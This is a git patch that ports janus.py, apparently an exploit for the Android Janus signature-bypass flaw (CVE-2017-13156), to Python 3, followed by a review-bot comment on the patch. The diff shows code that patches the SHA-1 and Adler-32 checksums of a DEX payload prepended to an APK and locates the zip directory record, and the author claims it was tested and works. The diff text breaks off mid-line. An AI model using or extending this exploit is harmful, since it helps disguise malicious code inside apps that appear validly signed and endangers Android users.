From 5b5e70690cc6c3e18ae9762358075275c02c63fe Mon Sep 17 00:00:00 2001 From: Disane Date: Thu, 14 Dec 2017 12:01:55 +0100 Subject: [PATCH] Now works on Python 3.6+ + Added original __author___ name + Added commentary + Ported code to execute on Python 3.6.1+: + memoryview used to calculate adler32 checksum + end of central directory magic bytes are now passed to rfind() as bytes instead of strings + Tested resulting APK on emulator AOSP Android OS ver. 5.1 x86-64 and it works! --- CVE-2017-13156/janus.py | 57 ++++++++++++++++++++++++++++++++++++----- 1 file changed, 51 insertions(+), 6 deletions(-) diff --git a/CVE-2017-13156/janus.py b/CVE-2017-13156/janus.py index 92856cc..f5b11ee 100644 --- a/CVE-2017-13156/janus.py +++ b/CVE-2017-13156/janus.py @@ -5,14 +5,38 @@ import hashlib from zlib import adler32 +__author__ = 'V-E-O' +__github__ = 'https://github.com/V-E-O' + + +''' +Edited by Disane @ https://github.com/Disane ++ Added commentary ++ Ported code to execute on Python 3.6.1+: + + memoryview used to calculate adler32 checksum + + end of central directory magic bytes are now passed to rfind() as bytes + instead of strings ++ Tested resulting APK on emulator AOSP Android OS ver. 5.1 x86-64 + and it works! +''' + + def update_checksum(data): + # acquire SHA1 algo m = hashlib.sha1() m.update(data[32:]) + # patch SHA1 inside prepended DEX data[12:12+20] = m.digest() - v = adler32(buffer(data[12:])) & 0xffffffff + # pass everything (except for the DEX header and Adler32 section) + # of the payload DEX to the Adler32 checksum algo + # mask to cut down anything past 32 bits + v = adler32(memoryview(data[12:])) & 0xffffffff + # convert Adler32 result to little endian + # and write it back into the payload data[8:12] = struct.pack(" PK\x05\x06 + cd_end_addr = apk_data.rfind(b'\x50\x4b\x05\x06') + # unpack little endian aligned data + # and look for central directory size in the end of directory cd_start_addr = struct.unpack("
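Review bot: The comment added above the `adler32` call in `update_checksum` says the checksum skips "the DEX header and Adler32 section", but `data[12:]` drops only the first 12 bytes (the 8-byte magic and the 4-byte checksum field written back at `data[8:12]`) and still covers the rest of the header, including the SHA-1 just stored at `data[12:32]`; I would reword it to `# Adler-32 covers everything after the 8-byte magic and the 4-byte checksum field`. On the same line, `memoryview(data[12:])` wraps a slice that has already been copied if `data` is a bytearray (which the slice assignments suggest), so the wrapper adds nothing: `adler32(data[12:])` behaves the same on Python 3, and `memoryview(data)[12:]` is the form that actually avoids the copy. The triple-quoted "Edited by" block sits after the `__author__` assignments, so it is a bare string expression rather than a module docstring; `#` comments, or the commit message it duplicates, would carry that history better. The end of this hunk and the following `rfind` change are cut off on the page, so they are not covered here.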